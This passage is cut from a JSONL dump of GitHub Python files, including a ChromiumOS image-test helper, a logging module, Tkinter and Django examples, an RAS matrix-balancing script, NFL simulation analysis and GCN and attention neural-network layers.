Uses the board's default image\n build path when not provided.\n\n Returns:\n bool - True if all tests passed, False otherwise.\n \"\"\"\n if not board:\n raise InvalidArgumentError('Board is required.')\n if not result_directory:\n raise InvalidArgumentError('Result directory required.')\n\n if not image_dir:\n # We can build the path to the latest image directory.\n image_dir = image_lib.GetLatestImageLink(board, force_chroot=True)\n elif not cros_build_lib.IsInsideChroot() and os.path.exists(image_dir):\n # Outside chroot with outside chroot path--we need to convert it.\n image_dir = path_util.ToChrootPath(image_dir)\n\n cmd = [\n os.path.join(constants.CHROOT_SOURCE_ROOT, constants.CHROMITE_BIN_SUBDIR,\n 'test_image'),\n '--board', board,\n '--test_results_root', result_directory,\n image_dir,\n ]\n\n result = cros_build_lib.SudoRunCommand(cmd, enter_chroot=True,\n error_code_ok=True)\n\n return result.returncode == 0\n","repo_name":"qinjidong/easy75","sub_path":"src/third_party/chromite/service/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73329578167","text":"import time\n\nERROR = 1\nWARN = 3\nINFO = 5\nDEBUG = 7\nLEVEL = INFO\nLOGFILE = None\nINIT = False\n\ndef init(outfile, level=INFO):\n\tglobal LOGFILE, INIT, LEVEL\n\tLEVEL = level\n\tLOGFILE = open(outfile, 'w')\n\tINIT = True\n\tdebug('logfile initiated')\n\ndef writelog(msg, level):\n\tglobal LOGFILE, INIT, LEVEL\n\t\n\tif level <= LEVEL:\n\t\tprint(msg)\n\t\tif INIT:\n\t\t\ttry:\n\t\t\t\tLOGFILE.write(msg + '\\n')\n\t\t\texcept:\n\t\t\t\tprint(msg)\n\ndef levelcode(level):\n\tif level == 1:\n\t\treturn 'ERROR'\n\tif level == 3:\n\t\treturn 'WARN'\n\tif level == 5:\n\t\treturn 'INFO'\n\tif level == 7:\n\t\treturn 'DEBUG'\n\treturn 'LOG'\n\t\t\ndef error(msg, function=''):\n\tlog(msg, function, ERROR)\ndef warn(msg, function=''):\n\tlog(msg, function, WARN)\ndef info(msg, function=''):\n\tlog(msg, function, INFO)\ndef debug(msg, function=''):\n\tlog(msg, function, DEBUG)\ndef log(msg, function='', level=0):\n\tif level == 0:\n\t\tlevel = INFO\n\tif function != '':\n\t\tfunction += '()'\n\tnow = time.time()\n\twritelog('%s %s:%s - %s' % (now,function,levelcode(level),msg), level)\n\t\ndef end():\n\tglobal LOGFILE, INIT\n\tif INIT:\n\t\tLOGFILE.close()\n\t\ndef __del__():\n\tglobal LOGFILE, INIT\n\tif INIT:\n\t\tLOGFILE.close()","repo_name":"computeythings/Switchlist","sub_path":"switch_src/Logging.py","file_name":"Logging.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10469877400","text":"#Continuation from Menu bar\n#Displays image and text\n\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nclass Window(Frame):\n\n def __init__(self, master = None):\n Frame.__init__(self, master)\n\n self.master = master\n\n self.init_window()\n\n def init_window(self):\n self.master.title(\"GUI\")\n \n self.pack(fill=BOTH, expand = 1)\n menu = Menu(self.master)\n self.master.config(menu=menu)\n\n file = Menu(menu)\n file.add_command(label=\"Exit\", command=self.client_exit)\n file.add_command(label=\"Save\")\n menu.add_cascade(label=\"File\", menu=file)\n\n edit = Menu(menu)\n #Add empty parameters from self.showImg and self.showTxt\n #this initializes it immediately\n edit.add_command(label='Show Image', command=self.showImg)\n edit.add_command(label='Show Text', command=self.showTxt)\n\n 
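# note: command is handed the bound method itself (no parentheses); writing self.showImg() here would call it immediately during menu construction\n        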
menu.add_cascade(label='Edit', menu=edit)\n \n def client_exit(self):\n exit()\n\n def showImg(self):\n #Image from PIL\n load = Image.open('sampleImage.jpg')\n render = ImageTk.PhotoImage(load)\n\n img = Label(self, image=render)\n img.image = render\n img.place(x=0,y=0)\n\n def showTxt(self):\n text = Label(self, text=\"Twice x Once\")\n text.pack()\n \nroot = Tk()\n#Initial Window size\nroot.geometry(\"400x300\")\n\napp = Window(root)\n#Initializes and displays it\nroot.mainloop()\n","repo_name":"NathanJiangCS/Exploring-Python","sub_path":"Tkinter/Images and Text.py","file_name":"Images and Text.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75115815289","text":"# Bonus Work #2: SOLO LEARN ACTIVITY (SEARCH ENGINE) - 12/10/22\n\n# Write a program that takes a text and a word as input and passes them to a function called search().\n# The search() function should return \"Word found\" if the word is present in the text, \n# or \"Word not found\", if it's not.\n\ndef search(text, word):\n if word in text:\n print(\"\\n> Word found!\")\n else:\n print(\"\\n> Word not found!\")\n\nprint(\"\\n-----Function: Search Engine-----\\n\")\ntext = input(\"Enter text: \")\nword = input(\"Enter word: \")\nsearch(text, word)\nprint()","repo_name":"Code-Lab-1/programming-skills-portfolio-psjasmin","sub_path":"Chapter 7- Functions/Exercises/Bonus Work_2.py","file_name":"Bonus Work_2.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15302400596","text":"import json\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom airline_app.models import Users\n\n\n@api_view(['GET'])\ndef get_users(request):\n if request.session.get('user_e_mail') is not None and request.session.get('user_role') == 1:\n users = Users.objects.all()\n json_users = {'users': []}\n for user in users:\n confirmed = \"N\"\n if user.confirmed:\n confirmed = \"Y\"\n temp = {'name': user.name, 'surname': user.surname, 'e_mail': user.e_mail, 'role': user.id_role.role,\n 'id': user.id, 'confirmed': confirmed}\n json_users['users'].append(temp)\n return HttpResponse(json.dumps(json_users), content_type='application/json',\n status=status.HTTP_200_OK)\n else:\n return HttpResponse('error login', status=status.HTTP_401_UNAUTHORIZED)\n\n\n@csrf_exempt\n@api_view(['DELETE'])\ndef delete_user(request, u_id):\n if request.session.get('user_e_mail') is not None and request.session.get('user_role') == 1:\n user = Users.objects.filter(id=u_id).first()\n user.delete()\n return HttpResponse('ok', status=status.HTTP_200_OK)\n else:\n return HttpResponse('error login', status=status.HTTP_401_UNAUTHORIZED)\n\n\n@csrf_exempt\n@api_view(['GET', 'POST'])\ndef confirm_user(request, u_id):\n if request.session.get('user_e_mail') is not None and request.session.get('user_role') == 1:\n user = Users.objects.filter(id=u_id).first()\n user.confirmed = True\n user.save()\n return HttpResponse('ok', status=status.HTTP_200_OK)\n else:\n return HttpResponse('error login', 
status=status.HTTP_401_UNAUTHORIZED)\n","repo_name":"morozvolodymyr-zz/airline","sub_path":"airline_app/admin_users_list_view.py","file_name":"admin_users_list_view.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70998218168","text":"import datetime\n\nSOURCE = 0\nWATER_LEVEL = 0\nPREVIOUS_ADC = 0\nNO_INPUT_START = None\ndata = []\n\n\ndef tank_monitor(adc):\n    global SOURCE\n    global WATER_LEVEL\n    global PREVIOUS_ADC\n    global NO_INPUT_START\n\n    time_now = datetime.datetime.now()\n    adc_level = adc\n    if adc_level < 100:\n        adc_level = 0\n\n    if NO_INPUT_START:\n        print(\n            f\"\\n0 adc:{adc_level} PREVIOUS:{PREVIOUS_ADC} NO_INPUT:{NO_INPUT_START.strftime('%H:%M:%S')} SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\"\n        )\n    else:\n        print(\n            f\"\\n0 adc:{adc_level} PREVIOUS:{PREVIOUS_ADC} NO_INPUT:{NO_INPUT_START} SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\"\n        )\n    # level_rate = pv.WATER_LEVEL_rate(adc_level)\n    orig_level = adc_level #pv.WATER_LEVEL\n\n    if not (PREVIOUS_ADC and NO_INPUT_START): # case where initialization is needed\n        PREVIOUS_ADC = adc_level\n        NO_INPUT_START = time_now\n\n    print(\n        f\"1 adc:{adc_level} PREVIOUS:{PREVIOUS_ADC} NO_INPUT:{NO_INPUT_START.strftime('%H:%M:%S')} SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\"\n    )\n    # no water-level input\n    if abs(adc_level - PREVIOUS_ADC) < 30:\n        td = time_now - NO_INPUT_START\n        print(f\"NO INPUT 0: td.seconds:{td.seconds} Tolerance:{30}\")\n        if (td.seconds >= 30): # if there has been no input for a set time\n            print(f\"NO INPUT 1: td.seconds:{td.seconds} Tolerance:{30}\")\n            if SOURCE == 0:\n                SOURCE = 1\n                print(f\"RUN_MODE:{SOURCE}\")\n            if len(data) > 5:\n                WATER_LEVEL = adc_level + 10000\n                print(f\"##### Predicted level: {WATER_LEVEL}\")\n            else:\n                print(\"###### Training failed. 
Returning original value\")\n                WATER_LEVEL = orig_level\n            # get prediction from ML model\n            print(f\"2 SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\")\n\n        else:\n            print(f\"NO INPUT 2: td.seconds:{td.seconds} Tolerance:{30}\")\n            WATER_LEVEL = orig_level # treat as a transient glitch and discard the level value\n            print(f\"3 SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\")\n    else: # water-level input is present\n        # switch from prediction mode back to level-sensor mode\n        if SOURCE == 1:\n            SOURCE = 0\n            print(f\"4 SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\")\n            print(f\"RUN_MODE:{SOURCE}\")\n\n        PREVIOUS_ADC = adc_level\n        NO_INPUT_START = time_now\n        WATER_LEVEL = adc_level\n\n    append_data([time_now.strftime(\"%Y-%m-%d %H:%M:%S\"), WATER_LEVEL, SOURCE])\n    print(\n        f\"5 adc:{adc_level} PREVIOUS:{PREVIOUS_ADC} NO_INPUT:{NO_INPUT_START.strftime('%H:%M:%S')} SOURCE:{SOURCE} WATER_LEVEL:{WATER_LEVEL}\"\n    )\n\n\ndef append_data(l):\n    data.append(l)","repo_name":"iryek-rpi/rpi-pump","sub_path":"Test/logic/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24694637862","text":"class Nodo(object):\n    def __init__(self, nombre, vecinos = None):\n        self.nombre = nombre\n        self.vecinos = [] if vecinos is None else vecinos\n        self.distancias = {}\n        self.mensajes = []\n    \n    def addVecino(self, vecino, distancia = 0):\n        self.vecinos.append(vecino)\n        self.distancias[vecino.nombre] = distancia\n        vecino.distancias[self.nombre] = distancia\n    \n    def paquete(self, type, headers, payload):\n\n        paquete = {\n            \"type\": type,\n            \"headers\": headers,\n            \"payload\": payload\n        }\n\n        if paquete not in self.mensajes:\n            self.mensajes.append(paquete)\n        return paquete\n    \n    def __repr__(self):\n        vecinos_nombres = [vecino.nombre for vecino in self.vecinos]\n        return \" Nodo: \" + str(self.nombre) + \" Vecinos: \" + str(vecinos_nombres) + \" Distancias: \" + str(self.distancias)","repo_name":"JuanDiegoAvila/Lab3_Redes","sub_path":"nodo.py","file_name":"nodo.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43692674051","text":"import transaction\nfrom ftw.builder import Builder, create\nfrom ftw.contentpage.testing import FTW_CONTENTPAGE_FUNCTIONAL_TESTING\nfrom ftw.testbrowser import browsing\nfrom plone.registry.interfaces import IRegistry\nfrom unittest import TestCase\nfrom zope.component import getUtility\n\n\nclass TestListingBlockTableHelper(TestCase):\n\n    layer = FTW_CONTENTPAGE_FUNCTIONAL_TESTING\n\n    def setUp(self):\n        content_page = create(Builder('content page'))\n        self.listing_block = create(Builder('listing block').within(content_page))\n        self.file_ = create(Builder('file')\n                            .with_dummy_content()\n                            .having(description='S\\xc3\\xb6me description')\n                            .within(self.listing_block))\n\n    @browsing\n    def test_file_link_default_value(self, browser):\n        browser.login().visit(self.listing_block, view='block_view')\n        self.assertEquals(\n            self.file_.absolute_url() + '/download',\n            browser.css('.linkWrapper a').first.attrib['href']\n        )\n\n    @browsing\n    def test_file_link_empty_registry_value_without_trailing_slash(self, browser):\n        registry = getUtility(IRegistry)\n        registry['ftw.contentpage.listingblock.defaultfileviewname'] = u''\n        transaction.commit()\n\n        browser.login().visit(self.listing_block, view='block_view')\n        self.assertEquals(\n            self.file_.absolute_url(),\n            browser.css('.linkWrapper a').first.attrib['href']\n        )\n\n    @browsing\n    def test_file_link_changed_registry_value(self, 
browser):\n        registry = getUtility(IRegistry)\n        registry['ftw.contentpage.listingblock.defaultfileviewname'] = u'some-viewname'\n        transaction.commit()\n\n        browser.login().visit(self.listing_block, view='block_view')\n        self.assertEquals(\n            self.file_.absolute_url() + '/some-viewname',\n            browser.css('.linkWrapper a').first.attrib['href']\n        )\n","repo_name":"4teamwork/ftw.contentpage","sub_path":"ftw/contentpage/tests/test_listingblock_table_helper.py","file_name":"test_listingblock_table_helper.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"6576971275","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/9/23\n# @Author : github.com/xfLee\n\nimport numpy as np\n\nclass RAS(object):\n    def __init__(self, A0, X1, u1, v1, epsilon, revisedElements):\n        self.A0 = A0\n        self.X1 = X1\n        self.u1 = u1\n        self.v1 = v1\n        self.i = np.ones((1, A0.shape[0]))\n        self.epsilon = epsilon\n        self.revisedElements = revisedElements\n\n    def revise(self):\n        for idx, val in self.revisedElements.items():\n            self.A0[idx] = 0\n            self.X1[idx[0], idx[0]] -= val\n            self.u1[idx[0]] -= val\n            self.v1[idx[1]] -= val\n\n    def run(self):\n        Zk = np.dot(self.A0, self.X1)\n        uk = np.dot(self.i, np.transpose(Zk))\n        vk = np.dot(self.i, Zk)\n        k = 1\n\n        R = np.diag(self.u1 * (1 / uk))\n        S = np.diag(self.v1 * (1 / vk))\n\n        u1, v1 = self.u1, self.v1\n\n        while sum(abs(u1 - uk)) >= self.epsilon or sum(abs(v1 - vk)) >= self.epsilon:\n            Rk = u1 * (1 / uk)\n            Zk = np.dot(np.diag(Rk), Zk)\n\n            u1 = np.dot(self.i, np.transpose(Zk))\n            vk = np.dot(self.i, Zk)\n\n            Sk = v1 * (1 / vk)\n            Zk = np.dot(Zk, np.diag(Sk))\n\n            uk = np.dot(self.i, np.transpose(Zk))\n            v1 = np.dot(self.i, Zk)\n\n            if k == 1:\n                R = np.diag(Rk)\n                S = np.diag(Sk)\n            else:\n                R = np.dot(np.diag(Rk), R)\n                S = np.dot(np.diag(Sk), S)\n            k += 1\n\n        Z2n = np.dot(np.dot(np.dot(R, self.A0), self.X1), S)\n        A1 = np.dot(np.dot(R, self.A0), S)\n\n        for idx, val in self.revisedElements.items():\n            Z2n[idx] = val\n            A1[idx] = val / (self.X1[idx[0], idx[0]] + val)\n\n        return k, A1, Z2n, R, S\n\ndef test():\n    Z0 = np.array([[0, 120, 40],\n                   [90, 60, 90],\n                   [60, 40, 100]])\n    X0 = np.array([300, 400, 500])\n    A0 = np.dot(Z0, np.linalg.inv(np.diag(X0)))\n    X1 = np.diag([400, 500, 600])\n    u1 = np.array([180, 330, 220])\n    v1 = np.array([200, 240, 290])\n    epsilon = 0.01\n    revisedElements = {(1, 1): 75}\n    ras = RAS(A0, X1, u1, v1, epsilon, revisedElements)\n    ras.revise()\n    k, A1, Z2n, R, S = ras.run()\n    print(\"1. Number of loop iterations in the revised RAS computation: \" + str(k - 1))\n    print(\"2. Target-year direct consumption coefficient matrix A1 estimated by the revised RAS method:\")\n    print(A1)\n    print(\"3. Target-year consumption matrix A1*X1 estimated by the revised RAS method:\")\n    print(Z2n)\n    print(\"4. Target-year R matrix estimated by the revised RAS method:\")\n    print(R)\n    print(\"5. Target-year S matrix estimated by the revised RAS method:\")\n    print(S)\n\n# if __name__ == \"__main__\":\ntest()","repo_name":"xfLee/IOtools","sub_path":"revisedRAS.py","file_name":"revisedRAS.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26369942963","text":"from os import listdir\nfrom os.path import isfile, join\nimport pickle\nfrom mass_simulate_compare_odds import add_to_running_dict_df, extract_info, get_predicted_win_loss, load_odds_history_df\nimport statistics as stat\nimport statsmodels as sm\nfrom math import sqrt\n\ndef get_all_file_paths(base_path='results_save'):\n    return [join(base_path, f) for f in listdir(base_path) if isfile(join(base_path, f))]\n\ndef load_file_for_oddsrow(odds_row, excl_vs_before=True, n_sims=258):\n    if excl_vs_before:\n        
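# result files are named like results_save/yr.<year>_wk.<week>[_excl]_H.<home>_A.<away>_n.<n_sims>_results.pkl (see fp_ below)\n        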
excl_str = '_excl'\n else:\n excl_str = ''\n H_team = odds_row['home']\n A_team = odds_row['away']\n fp_ = 'results_save\\\\yr.' + str(odds_row['year']) + '_wk.' + str(odds_row['week']) + excl_str + '_H.' + H_team + '_A.' + A_team + '_n.' + str(n_sims) + '_results.pkl'\n with open(fp_, 'rb') as file:\n final_data = pickle.load(file)\n return final_data\n\ndef apply_home_team_advantage(odds_row, home_mod, excl_vs_before=False, n_sims=258, percentile_break=.1):\n if excl_vs_before:\n excl_str = '_excl'\n else:\n excl_str = ''\n week = odds_row['week']\n\n H_team = odds_row['home']\n A_team = odds_row['away']\n fp_ = 'results_save\\\\yr.' + str(odds_row['year']) + '_wk.' + str(odds_row['week']) + excl_str + '_H.' + H_team + '_A.' + A_team + '_n.' + str(n_sims) + '_results.pkl'\n if not isfile(fp_):\n return\n with open(fp_, 'rb') as file:\n final_data = pickle.load(file)\n H_minus_A_history = final_data['H_minus_A_history']\n H_plus_A_history = final_data['H_plus_A_history']\n\n print('test:', H_minus_A_history)\n\n H_minus_A_history = [x + home_mod for x in H_minus_A_history]\n\n if odds_row['favorite'] == odds_row['home']:\n home_spread_open = odds_row['spread_open']\n home_spread_close = odds_row['spread_close']\n else:\n home_spread_open = -1*odds_row['spread_open']\n home_spread_close = -1*odds_row['spread_close']\n\n over_under_better_open, over_under_better_close, WL_better_than_vegas, better_ATS_open, better_ATS_close, AST_open_dif, AST_close_dif, OU_open_better_dif, OU_close_better_dif, final_total = \\\n extract_info(H_minus_A_history, H_plus_A_history, odds_row, home_spread_open, home_spread_close, percentile_break)\n\n if odds_row['final_real_home_minus_away'] > 0:\n H_win = 1\n elif odds_row['final_real_home_minus_away'] < 0:\n H_win = 0\n else:\n H_win = .5\n\n\n\n WL_better_than_vegas, p_dif_temp = get_predicted_win_loss(H_minus_A_history, odds_row['ML'], home_spread_close,\n odds_row['final_real_home_minus_away'])\n\n final_data = {'home': H_team, 'away': A_team,\n 'home_spread_open': home_spread_open, 'home_spread_close': home_spread_close,\n 'pred_spread_median': stat.median(H_minus_A_history), 'pred_spread_avg': stat.mean(H_minus_A_history),\n 'over_under_better_open': over_under_better_open, 'over_under_better_close': over_under_better_close,\n 'WL_better_vegas': WL_better_than_vegas, 'better_ATS_open': better_ATS_open,\n 'better_ATS_close': better_ATS_close, 'n_sims': n_sims, 'excl_vs_before': excl_vs_before,\n 'True_H_win': H_win, 'True_H_minus_A': odds_row['final_real_home_minus_away'], 'True_total_score': final_total,\n 'AST_open_dif': AST_open_dif, 'AST_close_dif': AST_close_dif,\n 'OU_open_better_dif': OU_open_better_dif, 'OU_close_better_dif': OU_close_better_dif, 'H_minus_A_history': H_minus_A_history,\n 'H_plus_A_history': H_plus_A_history}\n\n fp_out = 'results_save\\\\yr.' + str(odds_row['year']) + '_wk.' + str(odds_row['week']) + '_hm.' + str(home_mod) + excl_str + '_H.' + H_team + '_A.' + A_team + '_n.' + str(n_sims) + '_results.pkl'\n with open(fp_out, 'wb') as file:\n pickle.dump(final_data, file)\n\ndef update_home_mod(home_mod=2):\n print('Upating data. 
Home_mod =', 2)\n YEAR = 2019\n MAX_EFFECTIVE_TIME = 900\n odds_data_df = load_odds_history_df(YEAR)\n running_dict = {}\n HOME_MOD = 2\n for idx, row in odds_data_df.iterrows():\n apply_home_team_advantage(row, home_mod, n_sims=999)\n\ndef sim_season(year=2018, n_sims=258):\n YEAR = year\n odds_data_df = load_odds_history_df(YEAR)\n team_records = {}\n for idx, odds_row in odds_data_df.iterrows():\n week = odds_row['week']\n if False:\n if YEAR == 2019:\n if week < 3 or week == 15 or week == 17:\n continue\n elif YEAR == 2018:\n if week in [3, 4, 8, 12, 14, 15, 16, 17]:\n continue\n H_team = odds_row['home']\n A_team = odds_row['away']\n for team in [H_team, A_team]:\n if team not in team_records:\n team_records[team] = 0\n week_data = load_file_for_oddsrow(odds_row, excl_vs_before=True, n_sims=n_sims)\n if YEAR == 2019:\n n_home_wins = 0\n n_home_losses = 0\n for game_plus_minus in week_data['H_minus_A_history']:\n if game_plus_minus > 0:\n n_home_wins += 1\n elif game_plus_minus < 0:\n n_home_losses += 1\n p_home_win = n_home_wins / (n_home_wins + n_home_losses)\n else:\n p_home_win = week_data['p_home_win'] / (week_data['p_home_win'] + week_data['p_away_win'])\n team_records[H_team] += p_home_win\n team_records[A_team] += 1 - p_home_win\n print('records:')\n print(team_records)\n\n sorted_records = {k: v for k, v in sorted(team_records.items(), key=lambda item: item[1])}\n print(sorted_records)\n team_actual_records_2019 = {'CIN': 2, 'MIA': 5, 'WAS': 3, 'NYG': 4, 'CAR': 5, 'JAX': 6, 'NYJ': 7, 'DET': 3, 'ARI': 5,\n 'IND': 7, 'ATL': 7, 'OAK': 7, 'CHI': 8, 'DEN': 7, 'CLE': 6, 'HOU': 10, 'SEA': 11, 'PIT': 8,\n 'PHI': 9, 'GB': 13, 'TEN': 9, 'BUF': 10, 'LAC': 5, 'LA': 9, 'MIN': 10, 'TB': 7, 'DAL': 8,\n 'NO': 13, 'BAL': 14, 'KC': 12, 'SF': 13, 'NE': 12}\n\n team_actual_records = team_actual_records_2019\n # HOU > BUF: Wrong\n # TIT > NE: Wrong\n # MIN > NO: Wrong\n # SEA > PHI: Wrong\n\n # 49 > MIN: Correct!\n # TIT > BAL: Wrong\n # KC > HOU: Correct!\n # GB > SEA: Wrong\n\n # KC > TIT: Correct!\n # 49 > GB: Correct!\n\n # HOU was the lowest at 17\n\n sum = 0\n difs = []\n actual = []\n sim = []\n for i, team in enumerate(sorted_records):\n print(32-i, '\\t', team, '\\t', round(sorted_records[team], 2), '\\t', team_actual_records[team], '\\t, dif:\\t', round(team_actual_records[team] - sorted_records[team], 2))\n dif = abs(team_actual_records[team] - sorted_records[team])\n actual.append(team_actual_records[team])\n sim.append(sorted_records[team])\n sum += sorted_records[team]\n difs.append(dif)\n print(stat.mean(difs))\n print(stat.mean(actual))\n print(stat.mean(sim))\n print('Mean dif:', round(stat.mean(difs), 3))\n print('RMSE:', sqrt(stat.mean([dif * dif for dif in difs])))\n\ndef create_max_num_fp():\n file_paths = get_all_file_paths()\n fp_inits = {}\n fp_n = {}\n for fp in file_paths:\n fp_initial = fp.split('_n.')[0]\n num_runs = int(fp.split('_n.')[1][0:3])\n if fp_initial not in fp_inits:\n with open(fp, 'rb') as file:\n data = pickle.load(file)\n fp_inits[fp_initial] = data\n fp_n[fp_initial] = num_runs\n\n if num_runs > fp_n[fp_initial]:\n with open(fp, 'rb') as file:\n data = pickle.load(file)\n fp_inits[fp_initial] = data\n fp_n[fp_initial] = num_runs\n\n for fp_initial in fp_inits:\n new_fn = fp_initial + '_n.999_results.pkl'\n with open(new_fn, 'wb') as file:\n pickle.dump(fp_inits[fp_initial], file)\n\n\ndef analyze_fp():\n file_paths = get_all_file_paths()\n running_dict = {}\n for fp in file_paths:\n # if 'excl' in fp:\n # continue\n # if 'wk.12' not in fp:\n # 
continue\n\n skip = True\n for wk in range(1, 11):\n if 'wk.' + str(wk) + '_' in fp:\n skip = False\n\n #if skip:\n # continue\n\n if '2020' in fp:\n continue\n if 'excl' in fp:\n continue\n if 'n.999' not in fp:\n continue\n\n if 'hm' in fp:\n continue\n\n if 'wk.17' in fp:\n continue\n with open(fp, 'rb') as file:\n results = pickle.load(file)\n # if 'excl_vs_before' in results:\n # results.pop('excl_vs_before')\n # continue\n add_to_running_dict_df(running_dict, results)\n\n print(running_dict)\n print('n =', len(running_dict['home']))\n for key, list_ in running_dict.items():\n #if key not in ['over_under_better_open', 'over_under_better_close']: # 'better_ATS_open', 'better_ATS_close', 'WL_better_vegas',\n # continue\n\n try:\n print(key, ': Average =', round(stat.mean(list_)*100,1), ', median =', round(stat.median(list_),3), ', n =', len(list_))\n method = 'beta'\n\n good = int(len(list_)*stat.mean(list_))\n\n lower_bound, upper_bound = sm.stats.proportion.proportion_confint(good,\n len(list_),\n alpha=.025, method=method.lower())\n print('[' + str(round(lower_bound*100, 1)) + ', ' + str(round(upper_bound*100, 1)) + ']')\n print('(' + str(round(stat.mean(list_)*100,1)) + ' [' + str(round(lower_bound*100, 1)) + ', ' + str(round(upper_bound*100, 1)) + '])')\n\n print('abs avg =', round(stat.median([abs(x) for x in list_]), 3))\n print()\n except:\n pass\n\n\nif __name__ == '__main__':\n #create_max_num_fp()\n sim_season(year=2019, n_sims=999)\n #update_home_mod()\n #analyze_fp()\n","repo_name":"paulcbogdan/NFL-play-by-player","sub_path":"analyze_results.py","file_name":"analyze_results.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"1603438458","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport math\n\nimport torch\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.module import Module\nfrom torch.nn import init\nimport ipdb\n\n### layers###\n#GCN layer\nclass GraphConvolution(Module):\n \"\"\"\n Simple GCN layer, similar to https://arxiv.org/abs/1609.02907\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.FloatTensor(in_features, out_features))\n if bias:\n self.bias = Parameter(torch.FloatTensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n support = torch.mm(input, self.weight)\n output = torch.spmm(adj, support)\n #for 3_D batch, need a loop!!!\n\n\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\n#Multihead attention layer\nclass MultiHead(Module):#currently, allowed for only one sample each time. 
As no padding mask is required.\n def __init__(\n self,\n input_dim,\n num_heads,\n kdim=None,\n vdim=None,\n embed_dim = 128,#should equal num_heads*head dim\n v_embed_dim = None,\n dropout=0.1,\n bias=True,\n ):\n super(MultiHead, self).__init__()\n self.input_dim = input_dim\n self.kdim = kdim if kdim is not None else input_dim\n self.vdim = vdim if vdim is not None else input_dim\n self.num_heads = num_heads\n self.embed_dim = embed_dim\n self.v_embed_dim = v_embed_dim if v_embed_dim is not None else embed_dim\n\n self.dropout = dropout\n self.head_dim = embed_dim // num_heads\n self.bias = bias\n assert (\n self.head_dim * num_heads == self.embed_dim\n ), \"embed_dim must be divisible by num_heads\"\n\n assert self.v_embed_dim % num_heads ==0, \"v_embed_dim must be divisible by num_heads\"\n\n self.scaling = self.head_dim ** -0.5\n\n\n self.q_proj = nn.Linear(self.input_dim, self.embed_dim, bias=bias)\n self.k_proj = nn.Linear(self.kdim, self.embed_dim, bias=bias)\n self.v_proj = nn.Linear(self.vdim, self.v_embed_dim, bias=bias)\n\n self.out_proj = nn.Linear(self.v_embed_dim, self.v_embed_dim//self.num_heads, bias=bias)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n if True:\n # Empirically observed the convergence to be much better with\n # the scaled initialization\n nn.init.normal_(self.k_proj.weight)\n nn.init.normal_(self.v_proj.weight)\n nn.init.normal_(self.q_proj.weight)\n else:\n nn.init.normal_(self.k_proj.weight)\n nn.init.normal_(self.v_proj.weight)\n nn.init.normal_(self.q_proj.weight)\n\n nn.init.normal_(self.out_proj.weight)\n\n if self.out_proj.bias is not None:\n nn.init.constant_(self.out_proj.bias, 0.)\n\n if self.bias:\n nn.init.constant_(self.k_proj.bias, 0.)\n nn.init.constant_(self.v_proj.bias, 0.)\n nn.init.constant_(self.q_proj.bias, 0.)\n\n def forward(\n self,\n query,\n key,\n value,\n need_weights: bool = False,\n need_head_weights: bool = False,\n ):\n \"\"\"Input shape: Time x Batch x Channel\n Args:\n need_weights (bool, optional): return the attention weights,\n averaged over heads (default: False).\n need_head_weights (bool, optional): return the attention\n weights for each head. Implies *need_weights*. 
Default:\n return the average attention weights over all heads.\n \"\"\"\n if need_head_weights:\n need_weights = True\n\n batch_num, node_num, input_dim = query.size()\n\n assert key is not None and value is not None\n\n #project input\n q = self.q_proj(query)\n k = self.k_proj(key)\n v = self.v_proj(value)\n q = q * self.scaling\n\n #compute attention\n q = q.view(batch_num, node_num, self.num_heads, self.head_dim).transpose(-2,-3).contiguous().view(batch_num*self.num_heads, node_num, self.head_dim)\n k = k.view(batch_num, node_num, self.num_heads, self.head_dim).transpose(-2,-3).contiguous().view(batch_num*self.num_heads, node_num, self.head_dim)\n v = v.view(batch_num, node_num, self.num_heads, self.vdim).transpose(-2,-3).contiguous().view(batch_num*self.num_heads, node_num, self.vdim)\n attn_output_weights = torch.bmm(q, k.transpose(-1,-2))\n attn_output_weights = F.softmax(attn_output_weights, dim=-1)\n\n #drop out\n attn_output_weights = F.dropout(attn_output_weights, p=self.dropout, 